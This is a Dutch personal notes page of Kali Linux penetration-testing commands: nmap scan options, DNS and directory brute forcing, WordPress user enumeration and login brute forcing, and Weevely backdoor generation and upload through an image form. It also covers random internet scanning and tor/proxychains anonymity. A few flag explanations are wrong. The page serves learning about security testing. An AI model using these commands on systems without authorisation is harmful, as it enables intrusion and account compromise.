Alle flags staan aan, wordt door sommige stateless firewalls toegestaan. - -PT: TCP ping scan
Gebruikt TCP voor ping, i.p.v. ICMP. - -Pn: Treats all hosts in the range as online
- -oN filename target: Produceer de uitvoer in normaal formaat.
- -oX filename target: Produceer de uitvoer in XML formaat.
- -oA filename target: Produceer de uitvoer in alle formaten.
- -oG filename target: Produceer de uitvoer in greppable
formaat.
Om een mooi lijstje te krijgen zou je bv.grep Up filename | cut -d"" -f2
- -O: OS detectie
- -A: OS detectie en bepalen van versies van services
- -iL: Scan targets from a text file
Je kan bv. 1 host per regel in de file zetten. - -p: Port scan, bv.
nmap -p 80 192.168.1.100-150
of -p22,25 of -p U:53,T:22,25.
Je kan ook--exclude-ports 53
gebruiken. - -Tx: Timing optie
0 = paranoid, 1 = sneaky, 2 = polite, 3 = normal, 4 = agressive en 5 = insane (default =3). 0 is het langzaamst. Veel pentesters gebruiken T4.
Betekenis output
Als een port filtered
is, betekent dat dat
nmap
niet kan bepalen of hij open of closed is.
DNS
Nmap comes with a script to query the DNS server for additional hosts
using a brute forcing technique.
It makes use of the vhosts-defaults.lst
and
vhosts-full.lst
dictionary files, which contain
a large list of common hostnames that have been
collected over the years by the Nmap development team.
The files can be located at /usr/share/nmap/nselib/data/
.
Nmap sends a query to the DNS server for each entry in that file
to check whether there are any A records available for that hostname in the DNS
zone.
nmap --script dns-brute --script-args dns-brute.domain=domain
HTTP methods
In the repository of Nmap scripts, you can find a script named http-methods.nse. When you run the script using the --script option along with the target, it will list the allowed HTTP methods on the target, and it will also point out the dangerous methods (zoals TRACE).
Diversen
Om bv. je eigen subnet te scannen doe je
nmap -oG - 192.168.1.0-255 -vv
(de -oG
is om greppable output te produceren).
nmap 192.168.1/24
kan ook.
Dit scant alle adressen op het lokale subnet.
Je kan ook 2 IP-adressen opgeven:
nmap 192.168.0.1 192.168.0.31
.
Beide adressen worden gescand.
Een andere manier om dit commando te geven is
nmap 192.168.0.1,31
.
nmap -sS -O IP_adres
('O' staat voor operating system, 'S' staat voor services).
In Wireshark
zie je nu dat er
SYN-packets gestuurd worden, en dat er soms een RST, ACK terugkomt.
In dat geval is de poort gesloten.
Met nmap -sV IP_adres
zie je de versies van de services die draaien op de open ports.
Je kan zo'n versie plus het woord 'exploit' in een zoekmachine plakken,
en kijken of er een vulnerability in zit.
Met nmap -sT IP_adres
worden TCP ports gescanned.
Als je een lange scan doet kan je ook om de zoveel seconden de status laten
weergeven, bv. met
nmap 192.168.0.1/24 -stats-every 3s
Om een snelllere scan te doen geeft je -F
mee.
Naast de -O
om het operating system te scannen,
kan je ook -osscan-guess
meegeven.
Je kan ook op een specifieke port scannen, met
nmap -p portnr IP_adres
Je kan meerdere poortnummers opgeven, gescheiden door komma's.
In plaats van een poortnummer kan je ook de naam van een service opgeven.
Servicenamen kan je ook weer door komma's scheiden.
Om random hosts op Internet te scannen kan je dit doen:
nmap -iR 3
(voor 3 hosts).
Je kan ook de IP-adressen van een aantal targets in een bestand zetten
(bv. targets.txt
,
en ze scannen met nmap -iL targets.txt
Met -iL input_file_name
kan je opgeven
welke hosts en netwerken gescanned moeten worden.
Op deze manier kunnen we voorbij routers en firewalls komen:
nmap -sS -P0 IP_address
(als P0 geen protocols als argument heeft worden ICMP packets e.d. gestuurd).
Zombie Mode
Wordt ook idle scanning genoemd. We wachten tot er op het doel een poort open gaat of een verbinding geopend wordt.
Tijdens zo'n scan doe je je voor alsof je een machine bent die niets doet.
Basically, we are mapping out any trusting relationships between host and
guests in order to use those ports:
nmap -Pn -p- -sl kiosk.adobe.com www.h3xnews.org
nbtscan
Kan range van adressen scannen op open poorten die met SMB te maken hebben
(bv. 135 en 139), bv.
nbtscan 192.168.1.100-150
In de uitvoer van deze scan zie je ook de Netbios naam, en de scan gaat
veel sneller dan een vergelijkbare scan met
nmap
op poorten 139 en 445.
md5sum
ssh-keygen
enum4linux
Bv.: enum4linux -v IP_address
Ik heb het idee dat deze scan tegenwoordig niet veel meer oplevert, omdat hij volgens mij gebruik maakt van 0-sessie (die overal is afgesloten).
Zie Kioptrix 4.
dirb
Hier
een uitgebreide handleiding van dirb
.
Met deze tool kan je files binnen een web server zoeken, een zgn. web content scanner.
Webservers bevinden zich meestal in /var/www
Het werkt via een brute force attack, gebaseerd op een dictionary.
Het commando ziet er als volgt uit:
dirb url_base wordlist(s) options
De simpelste vorm is
dirb IP-address
Interessante files zouden bv. phpinfo.php
(informatie
over PHP-configuratie)
en robots.txt
(mappen waarvan de sitebeheerder
niet wil dat Google ze indexeert).
Meer info hier.
Angry-ip
Sparta
Dit is een vulnerability scanner.
Deze tool start onder water een heleboel andere, zoals
nmap
,
nikto
, etc.
Vega
Dit is web application vulnerability scanner.
Hij zit niet standaard in Kali, maar kan met
apt install vega
toegevoegd worden.
Je moet eerst een target definiëren, en daarna welke modules je wilt gebruiken.
Dit soort scan kan een denial of service veroorzaken op een uplink met kleine bandbreedte.
wpscan
Scan op vulnerabilities in Wordpress.
Help info met wpscan -h
Update wpscan:
wpscan --update
Hoe herken je een WordPress site?
Hoe kan je zien of een site Wordpress gebruikt? Meestal staat onderaan 'Powered by Wordpress'.
Een andere methode is kijken naar de code, en zoeken naar 'wp' (bv. 'wp-includes', 'wp-content').
Non-intrusive scan
Non-intrusive scan:
wpscan --url IP_address/wordpress
Vraag over updaten db met 'y' beantwoorden.
Enumerating Usernames
Gebruik WPScan
om
geldige usernames te vinden.
Enumerate all users:
wpscan --url https://IP_address/wordpress
--enumerate u
wpscan --url url
-e options
(p voor plugins, ap voor all plugins, vp vulnerable plugins, t voor themes)
Bruteforcing login
wpscan --url URL --passwords wordlist --usernames [user|'user_list'] --max-threads 5
Discovering Plugins and More
Scan vulnerable plugings:
wpscan --url URL --enumerate vp
Scan all plugings & themes:
wpscan --url URL --enumerate at, ap
Nessus
Je kan dit programma starten met
/etc/init.d/nessusd start
Je kan nessus
via de browser gebruiken door naar
https://127.0.0.1:8834
te gaan.
Nexpose
Burp suite
Wordt gebruikt voor penetration testing against web applications.
Demo o.a. in CompTIA Pentest cursus van James Dion.
Burp
onderschept HTTP-verkeer voordat het verder
gestuurd wordt, zodat je er dingen in kan veranderen.
Eerst moet je via tabbladen Proxy
en
Options
een proxy server instellen.
Standaard staat die op 127.0.0.1
, poort
8080
.
Daarna zet je proxy settings in browser (bv. in Firefox
via Options - Advanced - Network - Settings
).
Daarna moet je het goede certificaat installeren,
via Options - Advanced - Certificates - View Certificates
- Import
).
Het certificaat heet cacert.der
(je kan zorgen dat ie bij Recently used
staat
door eerst in de browser het adres burp
in te tikken).
Je moet vinkjes zetten in alle 3 Trust this CA...
checkboxes.
Dirbuster
Brute force tool voor directories en filenamen op web/application servers.
Gebruik je wanneer sensitive directories of administration logging page niet publicly disclosed zijn.
Het programma is een multithreaded Java application.
W3AF
Web Application Attack and Audit Framework.
Tool om web app vulnerabilities mee te vinden.
W3AF
Web Application Attack and Audit Framework.
Tool om web app vulnerabilities mee te vinden.
Nikto
Nikto is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software, and other issues. It performs generic and server types of specific checks.
Dit is een open source web server (vulnerability) scanner. Hij identificeert verouderde versies, en foute configuraties van de server, zoals multiple index files en HTTP server options. Hij zoekt naar kwetsbaarheden in server, XSS, en webapplicaties als gallery/php.
Help info
In de Nikto wiki vind je meer info.
Met nikto -h
of
nikto -H
(uitgebreider).
Voorbeeld
nikto -host URL -output output_file
-format HTM
In het rapport kan je zien hoeveel requests er verstuurd zijn, en hoeveel findings er zijn.
Webinspect
redfang / fang
Hiermee kan je nondiscoverable Bluetooth devices vinden.
Een general scan kan heel lang duren:
fang -s
Met Redfang gaan we de device manufacturer codes vinden:
fang -l
Voor Apple is het bv. 000393.
Dan ga je naar Google, en tik je:
000393 vulnerability
BlueMaho
BlueMaho is GUI based scanning and exploitation tool.
Installeren via
git clone git://git.kali.org/packages/bluemaho.git
Ga dan naar folder en ./bluemaho.py
BlueSnarfer
BlueRanger
Weevely
In Kali zit een tool Weevely
,
waarmee je backdoors kunt genereren om naar een site te uploaden.
Voorbeeld:
weevely generate abcdef /root/shell.php
In dit geval wordt er een bestand shell.php
gegenereerd en op de aangegeven plek gezet, en het password op de file
is abcdef
De volgende stap is dat je het bestand op de site krijgt, bv. via de plek waar je eigenlijk een image moet uploaden.
Als dat lukt kan je daarna met weevely
er contact
mee maken:
weevely adres van file op server abcdef
Je krijgt dan een weevely
-prompt, en kan
Linux commando's intikken.
Met bv. id
kan je zien wie je bent
(www-data
als het goed is), en met
uname -a
om welke machine het gaat.
Maltego
Maltego
is een grafische tool in Kali Linux.
De 1e keer moet je wel een account aanmaken.
Maltego is proprietary software widely used for OSINT. Kali Linux includes the Community Edition of Maltego, which can be used for free with some limitations after completing the online registration. Maltego performs transforms over pieces of data (for example, email addresses, and domain names) to obtain more information, and it displays all of the results as a graph showing relationships among different objects. A transform is a search of public information about a particular object, for example, searches for IP addresses related to a domain name or social media accounts related to an email address or person's name.
Daarna vind je in de rechterhelft van het scherm een aantal plugins (transforms),
zoals Shodan
.
Als je een nieuwe graph aanmaakt, kan je links kiezen uit een
Entity Palette
, zoals Devices
en Infrastructure
.
Rechts plaats je dan de dingen waar je informatie over wilt hebben, en je vult de correcte waarden in. Als er dan met rechts op klikt, kan je kiezen welke transform je er op los wilt laten.
Met het muiswiel zoom je in en uit, door rechts te klikken in de graph kan je het beeld verschuiven.
Related entities
Je kan in de graph bv. het domein microsoft.com plaatsen, en de persoon Bill Gates, en ze dan met een lijntje met elkaar verbinden. Het worden dan related entities.
proxychains
Om dingen anoniem te doen?!
apt-get install -y tor
, dan:
apt-get install -y proxychains
Start tor, en kijk dan op welke poort het actief is, met
netstat -tanp | grep tor
Je kan de proxychains config file editen, en de socks 4 examples uncommenten:
nano /etc/proxychains.conf
Commix
Tool for command based injection and exploitation techniques.
Stel dat we alles over een target willen vinden, dan doen we:
commix --all URL --level=3
(3 is hoogste level).
Uniscan
Opties van Uniscan
:
- -q: Enable directory checks;
- -w: Enable file checks;
- -e: Enable Robots.txt and Sitemap.xml checks;
- -d: Enable dynamic checks;
- -s: Enable static checks;
- -g: Web fingerprints;
- -j: Server fingerprints;
- -u: URL to scan.
Dus: uniscan -u URL --qwedsjg
CMSmap
Installeren met:
git clone https://github.com/Dionach/CMSmap.git
Skipfish
Skipfish is a vulnerability scanner that begins by creating an interactive site map for the target website, using a recursive crawl and prebuilt dictionary. Each node in the resulting map is then tested for vulnerabilities. Speed of scanning is one of its major features that distinguishes it from other web vulnerability scanners. It is well-known for its adaptive scanning features, for more intelligent decision making from the response received in the previous step. It provides a comprehensive coverage of the web application in a relatively short time. The output of Skipfish is in the HTML format.
OpenVAS
The Open Vulnerability Assessment Scanner (OpenVAS) is a network vulnerability
scanner in Kali Linux.
A penetration test should always include a vulnerability assessment
of the target system, and OpenVAS does a good job of identifying vulnerabilities
on the network side.
OpenVAS is a fork of Nessus, one of the leading vulnerability scanners in the
market, but its feeds are completely free and licensed under GPL.
The latest version of Kali Linux doesn't include OpenVAS, but it can be easily
downloaded and installed using APT as follows:
$ apt-get install openvas
Once installed in Kali Linux, OpenVAS requires an initial configuration before
you start using it.
Go to Applications | Vulnerability Analysis
, and
select OpenVAS initial setup.
Kali Linux needs to be connected to the internet to complete this step as
the tool downloads all of the latest feeds and other files.
At the end of the setup, a password is generated, which
is to be used during the login of the GUI interface:
You can now open the graphical interface by pointing your browser to
https://127.0.0.1:9392
Accept the self-signed certificate error, and then log in with
the admin username and the password generated during the initial configuration.
OpenVAS is now ready to run a vulnerability scan against any target.
You can change the password after you log in, by navigating to
Administrations | Users
and selecting the edit
user option (marked with a spanner) against the username.
The GUI interface is divided into multiple menus, as described here.
SQLNinja
SQLNinja is a tool written in Perl, and it can be used to attack Microsoft SQL server vulnerabilities and gain shell access.
Amap
Vergelijkbaar met nmap
You can invoke Amap using the -bqv option, which will only report the open ports and print the response received in ASCII and some detailed information related to it.
DNSEnum
DNSEnum is a command-line tool that automatically identifies basic DNS records such as MX, mail exchange servers, NS, domain name servers, or A—the address record for a domain. It also attempts zone transfers on all identified servers, and it has the ability to attempt reverse resolution (that is, getting the hostname given an IP address) and brute forcing (querying for the existence of hostnames in order to get their IP address) of subdomains and hostnames.
Fierce
Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.
Fierce uses zone transfer, dictionary attacks, and reverse resolution to gather hostnames and subdomains along with the IP addresses of a domain, and it has the option to search for related names (for example, domain company.com, corpcompany.com, or webcompany.com).
Gebruik: fierce -dns domain
DNSRecon
This tool lets you gather DNS information
through a number of techniques including zone transfer, dictionary requests,
and Google search.
In the following command, we will do an enumeration by zone transfer (-a),
reverse analysis of the IP address space obtained by Whois (-w), and
Google search (-g):
dnsrecon -a -g -w -d zonetransfer.me
Findmyhash
findmyhash
kan een heleboel soorten hashes aan.
Basic syntax: python /usr/bin/findmyhash algorithm
options
(het stuk voor findmyhash kan je weglaten).
gobuster
Directory bruteforcing tool.
Bv.: gobuster dir -u http://192.168.0.149/ -x php,txt,bak,old,zip,gz,conf,cnf,js -w /home/kali/Desktop/Big.txt -t 40
Nemesis
Nemesis is a program for generating packets on the network layer level (among others the protocols ICMP and IP), the transport level (TCP and UDP protocols), and the data connector layer (Ethernet and APR protocols); and inserting them into the network.
The software can be installed as follows:
tar -zxvf nemesis-1.4beta3.tar.gz
cd nemesis-1.4beta3
./configure
make
make install (as root)
Searchsploit
Allow you to search through exploits and shellcodes using one or more terms from Exploit-DB.
searchsploit [options] term1 [term2] ... [termN]
Meestal is het voldoende om iets te doen in de geest van:
searchsploit proftpd 1.3.3c
OPTIONS
-c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe).
-e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies "-t"].
-h, --help Show this help screen.
-j, --json [Term] Show result in JSON format.
-m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory.
-o, --overflow [Term] Exploit titles are allowed to overflow their columns.
-p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible).
-t, --title [Term] Search JUST the exploit title (Default is title AND the file's path).
-u, --update Check for and install any exploitdb package updates (deb or git).
-w, --www [Term] Show URLs to Exploit-DB.com rather than the local path.
-x, --examine [EDB-ID] Examine (aka opens) the exploit using $PAGER.
--colour Disable colour highlighting in search results.
--id Display the EDB-ID value rather than local path.
--nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
Use "-v" (verbose) to try even more combinations
--exclude="term" Remove values from results. By using "|" to separated you can chain multiple values.
e.g. --exclude="term1|term2|term3".
Links
Reageer via E-mail (dalmolen@xs4all.nl)
Deze pagina is voor het laatst gewijzigd op: 30-01-23 22:18:22